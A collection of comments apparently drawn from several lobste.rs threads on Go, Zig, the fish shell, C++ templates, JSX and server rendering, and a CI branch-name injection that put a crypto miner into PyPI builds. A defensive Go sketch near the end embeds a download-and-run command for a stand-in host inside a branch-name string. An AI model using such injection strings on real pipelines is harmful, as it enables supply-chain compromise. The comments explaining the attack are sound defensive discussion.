He indirectly acknowledges that Go lacks a bunch of good features, fair enough. But then he insinuates that that is because those features are hard to understand (require devs “capable of understanding a brilliant language”). That is wrong on the facts, at least in the case of sum types. It is also rude: he uses the word “brilliant” as a synonym for ‘hard to understand’. That is a ‘back-handed compliment’, which is another word for ‘insult’ in the brilliant English language ;-) .
As for its relevance to Go: sure, the quote is not enough to condemn Go. But it suggests the big mistake (nil) that Go’s designers did, in fact, go on to make. Which is why there is so much cause to quote it.
The context here is about how Go was designed. A quote from the creator of the language about how it was designed at a time when it was designed seems like the most appropriate thing possible to bring up.
I agree with your second paragraph, but I see no relation to the first one. The language was designed in a certain way for certain reasons. If that was yesterday or 12 years ago does not really matter when looking at the lifecycle of the typical programming language.
Even within Google, Java is significantly bigger/more used than Go, and frankly, I don’t see much difference in their design goals. I would even say that Java is a better “Go” than Go itself - it has better concurrency primitives, now has virtual threads, and is a very simple language with utmost care for backwards compatibility. And it is already over its growing pains (which one would think Go could have easily avoided by learning from them…) - it is expressive, but not in the “redefine true to false” kind of dangerous way, has good-enough generics, etc.
Also, all that development into Java’s GCs can really turn the tables in a naive performance comparison - sure, value types can make the life of the Go GC easier, but depending on workload it may not be enough to offset something like the beast G1GC is - especially in server environments where RAM is plentiful (and often has to be plentiful).
Hmm, that’s odd. Your note almost literally quotes [a Hacker News comment](https://news.ycombinator.com/item?id=18564643), right down to the truncated link text ending in `...`; but the second link was introduced with the crucial words “And there are other hints on”, and those are missing. Anyway,
You’re correct, this is from the HN comment thread, which seems to be ground zero for the quote.
Thanks for clearing up the links, and thanks for the Youtube link with timestamp.
https://lobste.rs/s/tlmvrr/i_m_programmer_i_m_stupid#c_itjpt0 I noticed the same thing.
Great comment, I’ll add it to my notes about the quote.
What does “explicitly designed” mean in this context? This feels a lot like saying Python was explicitly designed as a teaching language and C explicitly for Unix, etc.
Also I’d argue that Go - despite Google - is a lot more in the tradition of Limbo, Alef and Newsqueak.
Google plus university students sounds a lot more like Python and Java, languages already used a lot by Google.
Anyways, let’s stick to the criticism. Let’s take Limbo. Limbo is rather close to Go. Just quite a bit more niche for many reasons. However to the best of my knowledge it wasn’t “explicitly designed for fresh university graduates”, certainly not at Google which didn’t exist at the time.
Is that also a language for amateurs with no taste?
I mostly ask because the specific context “people working at Google” under which it was created seems to be overly present in the argument, yet we talk about it largely as people who didn’t work at Google. Also, the claim that Go is largely used by amateurs (compared to Python, JavaScript, etc.) seems at least debatable.
And to be clear: I hate the fact that Google seemingly at some point decided to exert a lot more control. Honestly, I even dislike the fact that Go was created at Google. The main reason I got interested in the language originally was that I tend to like software designed by the Plan 9 crowd. What drew me in was that it was less niche - and that’s Google’s “fault” - as well as the promised stability, in a time where programming languages seem to be designed largely like fashion: one just adds whatever is currently en vogue, piling up “old ways of doing things” until enough cruft is accumulated for everyone to leave the sinking ship of “sounds good on paper” ideas, with code bases where you can tell when they were written depending on which feature was new and hip at the time. See Java’s OO features, or JavaScript’s million ways to write simple loops. Pike’s talks on how Go was essentially finished, with only generics remaining[1] and focus shifting to libraries, compiler, GC, etc., seemingly confirmed that. Then Pike got quiet and Google replaced the Go website with a heavily Google-branded one.
So in that sense I get where things come from. However, if you look at Go it’s also a clear next step from previous languages in the spirit of Alef, Newsqueak and Limbo. Channels exist in all of them and might be the thing that was copied the most. So that “awful, buggy concurrency primitive” has a history going back to the 80s and Go is currently the reason it’s been copied so much into other languages.
Why not say that then?
Wikipedia on amateur:
Calling someone who formally studied something for three years an amateur seems like a stretch. But even then, that disregards the reality of Go usage completely.
I don’t see how “having no taste” is “a fair assessment”.
Neither says “Go was designed for” nor “fresh university graduates”. And Google employees in this sentence sound more like an example of people who are amateurs with no taste. But even if not, I don’t see how this can be interpreted in a nice/factual way without losing any meaning. Let’s say Go was designed for Google employees. How is that different from Python being designed for teaching and other such things, and what does it say about the language? Is that a criticism? Why would one not want an easy-to-understand language?
If it’s just about it being technically correct (which seems like a stretch as described above) then what’s the thing the sentence wants to convey? In the context I’d expect it to be a criticism.
[1] look it up, their website mentioned they’d add them from pre 1.0 days and that statement only was changed after they added them. Just to counter the wrong trope of “they finally convinced them”.
I feel like this is sort-of correct. They are all quite competent, but I don’t think any of them have good ideas when it comes to language design. On the other hand, I can’t say that I agree with Andrew on language design either, since I find Zig a bit Go-ish. There’s a lot of skill behind it and its ideas are being executed well, I just think the ideas come together into something that I feel isn’t particularly good. Obviously quite a few people like Zig and are creating great stuff with it, but the same is true of Go.
As someone who is fairly content with go (mostly due to disillusionment with everything, certainly including go), and who hasn’t used zig, can you explain to me what you don’t like about zig and how it all comes together?
Come on, Andrew! No need to beat around the bush. Tell us how you really feel!
I feel like we live in a tech dystopia and I’m mad about it.
Borrowing Dan Luu’s words:
“People basically just accept that software has a ton of bugs and that it’s normal to run into hundreds or thousands of software bugs in any given week”
“widely used software is frequently 100000x slower than it could be if it were highly optimized”
Arguably it’s mainly societal pressures that create this incentive structure, however, the widespread use of a programming language as undisciplined as Go certainly factors into it.
And I’m happy to send a stray shot at Google any time for all the evil & advertisements they inflict on us.
Your language is less memory safe than Go.
What does that have to do with discipline? Erlang doesn’t have data races. Is Erlang now better than Go? (I mean, yes, but not the point.)
Depends on your definition of “discipline” in a language. Go loses points for: nil pointers, slice/map/channel footguns, no enums/sum types. It gains points for some type safety, memory safety, first-class testing and benchmarking tooling.
I’m not familiar with Erlang but no data races is a clear advantage over Go’s approach to concurrency. Rust is probably the most disciplined language for my own definition of disciplined (too disciplined for some domains like game dev).
Go should only receive partial credit for memory safety. Most sources of memory unsafety are not present in Go, but since data races can result in memory unsafety in Go, it cannot be said to be a memory safe language. There are two approaches to fixing this: the Java way, which is to make it so that data races can’t result in memory unsafety, and the Rust way, which is to make it so that data races can’t happen.
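For concreteness, here is a minimal sketch of the classic demonstration (after Russ Cox’s “Off to the Races” post; the type names are hypothetical). An interface value is two words, a method table pointer and a data pointer, and unsynchronized writers can leave a torn pair:

```go
// Racy writes to an interface value can be observed "torn": a reader
// may see A's method table paired with B's data pointer, and the call
// then reinterprets B's memory as an A. Whether this crashes, corrupts
// memory, or appears to work is up to the scheduler; `go run -race`
// reports the race.
package main

type I interface{ M() }

type A struct{ x int }

func (a *A) M() { _ = a.x }

type B struct{ s string }

func (b *B) M() { _ = len(b.s) }

var v I = &A{}

func main() {
	go func() {
		for {
			v = &A{x: 1} // unsynchronized two-word write
		}
	}()
	go func() {
		for {
			v = &B{s: "hi"} // racing write of a different (itab, data) pair
		}
	}()
	for {
		v.M() // may run one type's method on the other type's data
	}
}
```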
Or the Erlang way: data can only be copied, not shared.
It seems a fair tradeoff, given it often compiles to smaller and more efficient binaries than C itself.
On the other hand, Go not being memory safe with its choice of tradeoffs (middle-of-the-pack performance with the productivity of a GC) is a very sad fact of life. (It can segfault on race conditions, while similar languages, like Java, might corrupt a given object, but that will still be well-defined Java code and the runtime can just chug along.)
Surely segfaulting, crashing the process, and restarting it is preferable to continuing with some internal object in an invalid/corrupt/wrong state? Not that Go is guaranteed to crash for a data race updating a map.
The former fixes the problem, the latter allows it to continue to propagate.
Segfaulting is the happy case, but it’s up to the OS to detect, not Go (more or less).
What’s much more likely is that it silently corrupts either the user’s application state, or even worse, the runtime’s state, which can yield a completely unexpected error down the line which will be impossible to debug.
Quite.
But that also seems to be the implication of the Java case where you wrote ‘might corrupt a given object’. So the program can still suffer knock-on errors of an essentially non-deterministic nature. Just because the runtime is still valid does not imply that the overall program is.
So how is that any different?
In Java the object you racily accessed might get into a bad state you didn’t want to get it into, but in Go, you might write into some random other object that had nothing to do with what you were accessing. It’s plain old UB that can result in pretty much anything you can think of.
The scope to which such an error can propagate is way different.
If I open a new thread and create a list with a few objects, they will 100% work in Java’s case. You can’t say the same for Go, as a hidden corruption of the runtime can rear its ugly head anywhere.
Preach. What reinforces this is the awful discourse around software dev.
Advocates for $CURRENT_TECH take most of the oxygen in the room, so toxic positivity is taken to be normative. Software design is often denigrated in favor of duct-taping more libraries together, as people love to advertise that they worship at the altar of Business Value exclusively. Most any design/testing philosophy is usually seen as “too hard,” despite bug counts being where they are. Devs regard make-work like keeping up with tiny, breaking package updates as equivalent to actually delivering value.
It’s like it’s a big social game where the objective is to pretend to care less about craft and instead signal properly that you are in the group of software developers.
As I watch the city burn around me, it’s hard not to feel that way too.
I think it’s societal pressures that cause the incentive structure. However, I do think that there is an insidious path dependence that cements a worse-is-better attitude: you start with buggy software, you try to make something better, people take a chance, it fails, and people assume that nothing better can happen, so they don’t invest in better software. Progress is slow and requires risk.
At the end of the day, you are trying to make something better and more aligned with your values. I hope you succeed. I would just caution against calling tens of thousands of people amateurs. No need to paint with so broad a brush.
NB: I don’t like Go and I don’t work for Google. (Just to preempt allegations. :] )
See it as a stepping stone. I started as a PHP developer and then moved to Go. Rust or Zig will be my next language. If Go replaced inefficient and messy languages like PHP, Python and Ruby, that would be a win, I think. The good thing about Go is that it is simple enough to appeal to that immense group of amateur developers without taste.
Go will never replace PHP, Python or Ruby because they don’t occupy the same niche to begin with.
Also, it’s rich calling these “messy and inefficient” (besides the usual caveat that it is language implementations, not languages, that can be slow), especially with reference to Go, which is at most in the middle on a theoretical “close to bare metal” scale (the default Go compiler does very few optimizations, which is how it can output binaries fast, plus the runtime has a fairly simple GC which is no performance champion), and I think Go itself is a fairly good contender on the messiness scale, given its weak type system and two million-dollar mistakes instead of only one!
At least Ruby and Python give you a fast and dynamic environment for explorative programming and scripting with the capability of using very productive libraries due to the expressiveness of these languages, something in which Go is quite lacking (and that can be a fair tradeoff, mind you. But so is not taking this tradeoff).
Anyways, this can get subjective pretty quickly, resulting in language flame wars.
Fair enough. But I do think the niches of all of those languages have a large overlap. I group them all in the category: We want to run something on a server, and we don’t want it to be difficult.
‘Messiness’ is just a negative word for ‘dynamic environment.’ Both can be applicable, sometimes even at the same time. But if we are talking about the first quote, about the proliferation of bugs, then the negative interpretation feels like it has more weight. For me at least.
Thank you for linking to your talk, I really enjoyed it.
Lol great negative PR for zig
There are two kinds of languages. Those that are tasteful and those that are actually used. 🤷♂️
List of commercial companies and non-profit organizations using Zig in production. Some serious software (Bun, TigerBeetle, Tuple) in there, even if the lists aren’t long yet.
I had a better opinion of Zig’s creator before. Well, well, well.
You didn’t even mention my least favorite “feature” of Go: panic and recover. Totally not throw/catch!
I say this as someone who has been writing Go for years. I love Go for problems I just want done ASAP without totally screwing up, and I love Zig for problems whose solutions I want to be as good as they possibly can be.
I’m gonna learn how to (consistently) finish what I start.
I’ll start with a non-exhaustive list to track all of the things that I’ve started and not finished, so I can explicitly prune the ones I don’t intend to work on, and at least have something to go back to whenever I do have the energy to work on something.
If you figure out how, please let me know :’(
I’ve already made some progress in 2024 on it, so I’ll share a little bit here to help out.
The core insight is that I’m much more likely to finish something if I see consistent progress being made as I work on something, while my “typical” approach has been to ruminate on something for ~3 years and then “draw the rest of the owl” in a single weekend (see: most bunker labs posts as one example). The reason said typical approach “works” is it essentially makes it so all of the potential barriers to finishing the thing are gone (as I’ve already “finished it in my head”), so I can just go straight to the final product. This obviously doesn’t work for a large subset of problems (i.e. anything but the kind of research PoC I “usually” tend to put out).
Once I got that insight out of the way, the question became “how do I allow for lower issue resolution AoT such that I can make projects that are longer?”. What I’ve tried in 2024 so far has been REPL driven development (to a greater degree than I’ve been doing previously, full on Conjure integration, proper setup, etc) and it definitely helped a bit.
In 2025, I’m going to try and “practice finishing”, in the sense of trying to actually either eliminate projects or finish them before moving on to new stuff. I’ve actually been trying to force myself to make a new blog post every month (even if it doesn’t measure up to my usual standards; it’s a different medium), and I also fully completed AoC with a time limit per day (minus the last day to mop up the couple of bits that I had left to do). It’s too early to tell for these yet, but I suspect at the end of next year I’ll see some progress there.
Hope that helps at least a bit (it strongly depends on whether the source for your struggles resembles mine). Happy new year!
If either of you are interested in going nuclear, I can recommend Beeminder which I’ve been using for over a year now: https://www.beeminder.com
In short, you set a goal, like say writing 1 blog post a month, and if you don’t reach the goal, you get charged $x. The aim here isn’t to never lose money but to reach a point where you’re sufficiently incentivised (financially) to do whatever your goal is.
It’s pretty nutty at first but once you get into it, it becomes a pretty foolproof setup where I know if I stick something in Beeminder, it’ll get done whether I like it or not.
The founders have been around for over a decade as well and if you derail (don’t hit your goal) for a legitimate reason like you were sick, there are no questions asked around refunds.
It’s less of a traditional business and more of an economics experiment let loose but it works for a lot of people. There’s plenty of theorising on their blog as well: https://blog.beeminder.com/defail/
I had the same problem (that I would be working on too many things and would start new things before finishing existing things) so I instituted a system like OP in Things.app.
I only use projects for things that will require long and sustained effort and I put them into areas called Now/Next/Later. The idea is to work only on things in Now and to finish stuff before pulling in new things.
Each Things project has metadata and a slug that is also the tag for all mails relating to it and the subfolder in my projects directory etc.
Here’s how it looks: https://share.cleanshot.com/wHfd1shv
One thing I’ve found helpful is I explicitly list out next steps of my project in Obsidian as a checklist.
What I realized is that planning the project requires executive function, which can be worn down by the time I get time to push a project forward at the end of the day. These steps can be very simple or more complex. The goal is to get them down somewhere so that your brain doesn’t have to carry them around anymore. I usually write these early in the day if needed, when I have the most clarity.
Essentially, I’m coaching myself.
Oof - this is a (helpful!) tough observation to hear, because I know this (intellectually) from reading Getting Things Done, and now recognize that I’ve been dropping the ball in a way that I should have already known. Thank you for the prompt to pay more attention to my organizational systems and repair them to a more useful state!
I only realized it when coaching some coworkers. I tried it for myself and it really helps me.
Just tried doing a little dev over winter break without it and I definitely missed it! Easy to get lost in mazes of my own creation inadvertently.
Good luck, you’ll have beaten me to it :)
A mental trick I learned is to explicitly decide to be done with something, and to let that count as finished too.
I think it all boils down to determination. If you believe in yourself and commit to finishing everything you start, you will quickly arrive at the conclusion that you shouldn’t start anything.
Thanks for the write up!
I saw mention of async prompts becoming a core feature. Would love to help out on this. Have previous experience with Rust (original watchexec author) and fish async prompts (created lucid, the first really solid async prompt IMHO).
Some of you really need to join a trade union and get serious about having a reasonable work/life balance.
This is insane. Is the rest of the team that bad that they couldn’t handle it? Making Sentry calls blocking was a clear mistake, not sure how easy it was to avoid, but:
it should have been fixed the first time! Why does the same blocking issue occur after 2 days??
knowing the issue, why couldn’t the dev just disable the Sentry calls made by the app (assuming making them non-blocking was hard, which I don’t believe) instead of yapping about moving to the cloud?
Some people really need to learn how to disconnect.
The response from the wife was kind of sad, too. Kind of accepts that this is how life is, that all he cares about is work. I was surprised the fainting in the bathroom didn’t lead to an ER visit.
Hindsight is 20/20, but when this happened again I’d lean toward waking the dev up in the middle of the night, showing him the carnage, and then saying, “make it work ASAP.” You can also say you’re open to discussing cloud migration in the future, but for now prod needs to stay up.
Seems like the organizational structure protects him from the consequences of his actions too much.
The minimum team size is one. Why does there need to be anybody else who can handle it?
Seems like there was just one dev too.
The one dev could have handled it, disabling Sentry from the app was always an option
Yes. The real lesson may be to develop the soft skills to define when a problem must be fixed elsewhere and make other people agree and action it that way.
I wish this article had elaborated a bit on specific things creating a “Template Metapocalypse” and how they were later solved. To me, C++ still is a language where the standard library - STL - is a template library. I’m not denying that C++11 did address many problems, but developers still need to think a lot about what is a compile time expression and what is a runtime expression, and that the language imposes different constraints on each.
I’m not certain they were solved. But I think there was a collective opinion at some point that perhaps we might’ve gone too far with templates and we should back off a bit, despite everyone having believed that stuffing in enough Alexandrescu-inspired templating would bring us to valhalla.
I think there is a difference between say boost::regex (which IIRC is compile-time regexes) and STL … STL is definitely elaborate, but it works fine for me. I’ve never used anything in Boost, which seems to have been heavily influenced by template metaprogramming “fashion”
The error messages could be better, I think that is fundamental though
I disagree that the bad error messages problem is fundamental: cpp compilers could encode some common template patterns as internal state and detect common mistakes. This is possible, it “just” increases the compiler’s complexity because it now has to deal with a meta-cpp language. Rust is generally regarded as having mostly good errors (I’m proud of that), and some of that is smart language design that pushes restrictions closer and closer to the definition so that the compiler can have more information available about the problem, but I’d wager that the majority of it is attributable to rustc collecting metadata and doing analysis beyond what is needed to build a functional Rust compiler.
std::regex is originally based on boost::regex’s design and API; both are runtime regexes. That said, boost::regex kept evolving and improving, unlike the std:: one. Compile-time regex is https://github.com/hanickadot/compile-time-regular-expressions, a very fine library which should be the first tool to reach for when one needs regex in C++, as it’s somewhat uncommon to have to create regexes at runtime. If you actually do, for instance because you’re building filters based on user input (or simply because your users asked “I want to be able to put regexes in fields”), I’d recommend using Google’s re2 library.
Ah OK, thanks for the correction, probably should have looked that up… I haven’t used Boost, but I know Boost favors compile time, and it did so back when C++ was weaker at compile time (e.g. before C++11, 14, 17, …)
This was a long time ago, but FWIW
There are probably still a lot of C++ jobs like this, as C++ codebases can be pretty old. The original question was about “Template metapocalypse” – I guess my answer is that C++ is very heterogeneous and you may not have that problem.
I don’t know, to be honest. I’ve been doing C++ professionally for quite some time now and have really never seen this kind of job. Even something like Arduino ships modern C++ with pretty much the full C++ standard library by default.
Boost is definitely intended to be template based. Bear in mind it’s almost 30 years old and back in the day the performance gains at runtime were significant AND we didn’t expect compilation to be fast.
Lovely to see the changes and improvements. I keep eyeing Fish to replace my Zsh setup, but worry about losing out on years of muscle memory for POSIX-ish shell syntax.
In other news, I wish the blog had an RSS feed; I’d like to keep up to date with new releases to read about features etc.
We’ve made great progress in supporting POSIX syntax and features that don’t clash outright with fish. You should give it another try!
As a prime example of this, a while back they added the ability to do `FOO="blah" some-command` instead of the previous version where you need to prefix with `env`. This alone resolved something like 90% of the ways my daily use of fish diverged from what I would have written in bash or zsh.
A colleague of mine recently switched. That surprised me because he had quite some zsh setup and as far as I know fish does not really offer more feature-wise. He told me that he likes fish because it is more „snappy“.
Out of the box, Fish has far more features than Zsh. It doesn’t offer anything else feature-wise if you install all the Zsh modules that were created to implement Fish features, but they’re fiddly and often just don’t work as well. If you want Zsh like Fish, just use Fish.
I agree. The point is if you already invested the time to set up zsh with all kinds of modules, then switching to fish is not much of an improvement. So I don’t recommend fish to zsh power users.
That said, I have now the anecdotal evidence from one person that fish was still worth switching.
It’s far less janky than zsh, mostly because you have less user-authored code (users in general, not you specifically). I don’t touch my config for months on end and things just keep humming along well.
I don’t touch my Zsh config for years on end and likewise. On the other hand, I imagine my Zsh config took longer to write than your Fish config, though.
it is still an improvement because you end up with less shell code
I have also encountered people (online) who didn’t know that you could render web pages on the server.
React was their default; I saw some static websites that were just static JSX in React. Like if you wanted to put up some photos of your apartment or vacation on your own domain, you would create a React app for that.
People learn by imitation, and that’s 100% necessary in software, so it’s not too surprising. But yeah this is not a good way to do it.
The web is objectively worse that way, i.e. if you have ever seen a non-technical older person trying to navigate the little pop-out hamburger menus and so forth. Or a person without a fast mobile connection.
If I look back a couple decades, when I used Windows, I definitely remember that shell and FTP were barriers to web publishing. It was hard to figure out where to put stuff, and how to look at it.
And just synchronizing it was a problem
PHP was also something I never understood until I learned shell :-) I can see how JavaScript is more natural than PHP for some, even though PHP lets you render on the server.
To be fair, JSX is a pleasurable way to sling together HTML, regardless of if it’s on the frontend or backend.
Many backend server frameworks have things similar to JSX.
That’s not completely true; one beautiful JSX thing is that any JSX HTML node is a value, so you can use the full language at your disposal to create that HTML. Most backend server frameworks use templating instead. For most cases both are equivalent, but sometimes being able to put HTML values in lists and dictionaries, with the full power of the language, does come in handy.
Well, that’s exactly what your OP said. Here is an example in Scala. It’s the same style. It’s not like this was invented by react or even by frontend libraries. In fact, Scalatags for example is even better than JSX because it is really just values and doesn’t even need any special syntax preprocessor. It is pure, plain Scala code.
Maybe, but then just pick a better one? OP said “many” and not “most”.
Fine, I misread many as most as I had just woken up. But I’m a bit baffled that a post saying “pick a better one” for any engineering topic has been upvoted like this. Let me go to my team and let them know that we should migrate our whole Ruby app to Scala so we can get ScalaTags. JSX was the first such exposure of a values-based HTML builder for mainstream use; you and the sibling comment talk about Scala and Lisp as examples, two very niche languages.
When did I say that this was invented by React? I’m just saying that you can use JSX both on front and back which makes it useful for generating HTML. Your post, your sibling and the OP just sound slightly butthurt at Javascript for some reason, and it’s not my favourite language by any stretch of the imagination, but when someone says “JSX is a good way to generate HTML” and the response is “well, other languages have similar things as well”, I just find that as arguing in bad faith and not trying to bring anything constructive to the conversation, same as the rest of the thread.
But the point is that you wouldn’t have to - you could use a Ruby workalike, or implement one yourself. Something like Markaby is exactly that. Just take these good ideas from other languages and use it in yours.
Anyway, it sounds like we are in agreement that this would be better than just adopting JavaScript just because it is one of the few non-niche languages which happens to have such a language-oriented support for tags-as-objects like JSX.
I found that after all I prefer to write what is going to end up as HTML in something that looks as much like HTML as possible. I have tried the it’s-just-pure-data-and-functions approach (mostly with elm-ui, which replaces both HTML and CSS), but in the end I don’t like the context switching it forces on my brain. HTML templates with as many strong checks as possible are my current preference. (Of course, it’s excellent if you can also hook into the HTML as a data structure to do manipulations at some stage.)
For doing JSX (along with other frameworks) on the backend, Astro is excellent.
That’s fair. There’s advantages and disadvantages when it comes to emulating the syntax of a target language in the host language. I also find JSX not too bad - however, one has to learn it first which definitely is a lot of overhead, we just tend to forget that once we have learned and used it for a long time.
In the Lisp world, it is super common to represent HTML/XML elements as lists. There’s nothing more natural than performing list operations in Lisp (after all, Lisp stands for LISt Processing). I don’t know how old this is, but it certainly predates React and JSX (Scheme’s SXML has been around since at least the early aughts).
Yeah, JSX is just a weird specialized language for quasiquotation of one specific kind of data that requires an additional compilation step. At least it’s not string templating, I guess…
I’m aware; I wrote such a lib for Common Lisp. I was saying that most frameworks most people use are still in the templating world.
It’s a shame other languages don’t really have this. I guess having SXSLT transformation is the closest most get.
Many languages have this, here’s a tiny sample: https://github.com/yawaramin/dream-html?tab=readme-ov-file#prior-artdesign-notes
Every mainstream as well as many niche languages have libraries that build HTML as pure values in your language itself, allowing the full power of the language to be used–defining functions, using control flow syntax, and so on. I predict this approach will become even more popular over time as server-driven apps have a resurgence.
JSX is one among many 😉
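To make the contrast with string templating concrete, here is a minimal dependency-free sketch of the nodes-as-values idea (in Go, with hypothetical helper names); this is the shape that JSX, Scalatags, SXML, dream-html, etc. give you with nicer syntax:

```go
// HTML nodes as plain values: they live in slices and maps, are built
// with ordinary loops and conditionals, and escaping happens in one
// place instead of being the template author's problem.
package main

import (
	"fmt"
	"html"
	"strings"
)

type Node struct {
	Tag      string
	Text     string // used when Tag is empty
	Children []Node
}

func El(tag string, children ...Node) Node { return Node{Tag: tag, Children: children} }
func Text(s string) Node                   { return Node{Text: s} }

func render(n Node, b *strings.Builder) {
	if n.Tag == "" {
		b.WriteString(html.EscapeString(n.Text))
		return
	}
	fmt.Fprintf(b, "<%s>", n.Tag)
	for _, c := range n.Children {
		render(c, b)
	}
	fmt.Fprintf(b, "</%s>", n.Tag)
}

func main() {
	items := []string{"one", "two"}
	var lis []Node
	for _, it := range items { // the full language is available here
		lis = append(lis, El("li", Text(it)))
	}
	var b strings.Builder
	render(El("ul", lis...), &b)
	fmt.Println(b.String()) // <ul><li>one</li><li>two</li></ul>
}
```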
I am not a web developer at all, and do not keep up with web trends, so the first time I heard the term “server-side rendering” I was fascinated and mildly horrified. How were servers rendering a web page? Were they rendering to a PNG and sending that to the browser to display?
I must say I was rather disappointed to learn that server-side rendering just means that the server sends HTML, which is rather anticlimactic, though much more sane than sending a PNG. (I still don’t understand why HTML is considered “rendering” given that the browser very much still needs to render it to a visual form, but that’s neither here nor there.)
The Bible says “Render unto Caesar the things that are Caesar’s, and unto God the things that are God’s”. Adapting that to today’s question: “Render unto the Screen the things that are the Screen’s, and unto the Browser the things that are the Browser’s”. The screen works in images, the browser works in html. Therefore, you render unto the Browser the HTML. Thus saith the Blasphemy.
(so personally I also think it is an overused word and it sounds silly to me, but the dictionary definition of the word “render” is to extract, convert, deliver, submit, etc. So this use is perfectly inline with the definition and with centuries of usage irl so i can’t complain too much really.)
You can render a template (as in, plug in values for the placeholders in an HTML skeleton), and that’s the intended usage here I think.
I don’t think it would be a particularly useful distinction to make; as others said you generally “render” HTML when you turn a templated file into valid HTML, or when you generate HTML from another arbitrary format. You could also use “materialize” if you’re writing it to a file, or you could make the argument that it’s compilers all the way down, but IMO that would be splitting hairs.
I’m reminded of the “transpiler vs compiler” ‘debate’, which is also all a bit academic (or rather, the total opposite; vibe-y and whatever/who cares!).
It seems that was a phase? The term transpiler annoys me a bit, but I don’t remember seeing it for quite a while now.
Worked very well for Opera Mini for years. Made very low-end web clients far more usable. What amazed me was how well interactivity worked.
So now I want a server side rendering framework that produces a PNG that fits the width of my screen. This could be awesome!
There was a startup whose idea was to stream (as in video stream) web browsing similar to cloud gaming: https://www.theverge.com/2021/4/29/22408818/mighty-browser-chrome-cloud-streaming-web
It would probably be smaller than what is being shipped as a web page these days.
Exactly. The term is simply wrong…
ESL issue. “To render” is a fairly broad term meaning to provide/concoct/actuate; it has little to do with graphics in general.
Technically true, but in the context of websites, “render” is almost always used in a certain way. Using it in a different way renders the optimizations my brain is doing useless.
The way that seems ‘different’ to you is the way that is idiomatic in the context of websites 😉
Unless it was being rendered on the client, I don’t see what’s wrong with that. JSX and React were basically the templating language they were using. There’s no reason that setup cannot be fully server-generated and served as static HTML, and they could use any of the thousands of react components out there.
Yeah if you’re using it as a static site generator, it could be perfectly fine
I don’t have a link handy, but the site I was thinking about had a big janky template with pop-out hamburger menus, so it was definitely being rendered client side. It was slow and big.
I’m hoping tools like Astro (and other JS frameworks w/ SSR) can shed this baggage. Astro will render your React components to static HTML by default, with normal clientside loading being done on a per-component basis (at least within the initial Astro component you’re calling the React component from).
I’m not sure I would call a custom file type `.astro` that renders TS, JSX, and MD/X split by a frontmatter “shedding baggage”. In fact, I think we could argue that Astro is a symptom of the exact same problem you are illustrating from that quote.
That framework is going to die the same way that Next.js will: death by a thousand features.
huh couldn’t disagree more. Astro is specifically fixing the issue quoted: now you can just make a React app and your baseline perf for your static bits is now the same as any other framework. The baggage I’m referring to would be the awful SSG frameworks I’ve used that are more difficult to hold correctly than Astro, and of course require plenty of other file types to do what `.astro` does (`.rb`, `.py`, `.yml`, etc.). The State of JS survey seems to indicate that people are sharing my sentiments (Astro has a retention rate of 94%, the highest of the “metaframeworks”).
I don’t know if I could nail what dictates the whims of devs, but I know it isn’t feature count. If Next dies, it will be because some framework with SSG, SSR, ISR, PPR, RSC, and a dozen more acronym’d features replaced it. (And because OpenNext still isn’t finished.)
Astro’s design is quite nice. It’s flexing into SSR web apps pretty nicely I’d say. The way they organize things isn’t always my favorite, but if it means I can avoid ever touching NextJS I’m happy.
I’m starting to find a groove with TS.
Biggest pet peeve is how VSCode doesn’t seem to surface errors across the whole project: I have to open up files that were affected by a rename of an exported symbol to see red squigglies show up. Feels regressive from a usability perspective, as the computer knows this information, and all the older languages of yore could do this easily in an IDE.
I’m able to do that in IntelliJ. I was surprised it didn’t come up as a setting in vscode. It looks like they’ve been trying to solve the issue since 2016.
https://github.com/microsoft/vscode/issues/13953
For those who are curious but don’t want to pick through the github issue threads:
A malicious PR making a very innocent-looking change to the README used a branch name with shell commands in it, formatted in a way that would cause CI jobs to execute those commands when performing a build for upload to PyPI. Those commands downloaded a crypto miner and embedded it into the release package.
So the automated builds that were getting uploaded to PyPI had the miner, but the source on GitHub did not, and any build you produced manually by cloning the repository and running a build on your local machine would not have it either.
It’s an interesting attack. Hopefully we’ll see a more detailed description of why a branch name from a PR was getting consumed by GitHub CI in a way that could inject commands.
There was an action that echo’d the branch name without sanitizing anything: https://github.com/advisories/GHSA-7x29-qqmq-v6qc
Another lesson in never trusting user input
I don’t think “never trusting user input” is the right lesson to learn here. Why? Because I don’t think whoever wrote that code was aware they were trusting the branch name, or which properties of the branch name exactly they were trusting. So the lesson is not really actionable.
I think the lesson is that these kinds of string-replacement based systems (YAML templates, shell variable expansion etc.) just naturally invite these issues. They are inherently unsafe and we should be teaching people to use safer alternatives instead of teaching them to be vigilant 100% of the time.
For e.g. SQL queries it seems the industry has learned the lesson and you’ll rightfully get ridiculed for building your queries via naive string interpolation instead of using a query builder, stored procedures or something of the sort. Now we need to realize that CI workflows, helm charts and everything else using string-level YAML templating is the same deal.
The FP people have a mantra “parse, don’t validate” for consuming text. I think we need another one for producing text that’s just as snappy. Maybe “serialize, don’t sanitize”?
I’m wishing for a CI/automation tool that would provide functionality like “check out a git branch” as functions in a high-level language, not as shell commands embedded in a data file, so that user input is never sent to a shell directly at all. Maybe I should make one…
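The core of what I have in mind is just this (a sketch in Go; the function is hypothetical): user input travels as a distinct argv element and never passes through a shell, so a malicious branch name is an invalid ref, not a command.

```go
// exec.Command does not invoke /bin/sh: each argument stays a single
// argv entry no matter which metacharacters it contains. Contrast with
// what string-templated YAML effectively generates:
//   sh -c "git checkout <branch interpolated here>"
package main

import (
	"log"
	"os/exec"
)

func checkout(branch string) error {
	return exec.Command("git", "checkout", branch).Run()
}

func main() {
	// A branch name crafted for shell injection is harmless here.
	if err := checkout(`x"; curl evil.example | sh; "`); err != nil {
		log.Println("checkout failed, as an invalid ref should:", err)
	}
}
```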
Before all the hip yaml based CI systems, like github actions, pretty much everyone was using Jenkins.
The sorta modern way to use Jenkins these days is to write a Groovy script, which has stuff like `checkout scm` and various other commands. Most of these come from Java plugins, so the command never goes anywhere near a shell, though you do see a lot of use of the shell command function in practice (i.e. `sh "make"`).
Kinda a shame that Jenkins is so wildly unpopular, and these weird yaml-based systems are what’s in vogue. Jenkins isn’t as bad as people make it out to be, in my opinion.
Please do build something though because Jenkins isn’t exactly good either, and I doubt anyone would pick Groovy as a language for anything today.
I’ve used Jenkins quite a bit; it’s one of the sources of inspiration for that idea, indeed. But Groovy is a rather cursed language, especially by modern standards… it’s certainly one of my least favorite parts of Jenkins.
My idea for a shell-less automation tool is closer to Ansible than to Jenkins but it’s just a vague idea so far. I need to summarize it and share it for a discussion sometime.
Groovy is okay. Not the best language, but way ahead of any other language I’ve ever seen in a popular CI solution. And Ansible should die.
Have you considered Dagger?
edit: I just had to read a little down and someone else points you the same way…
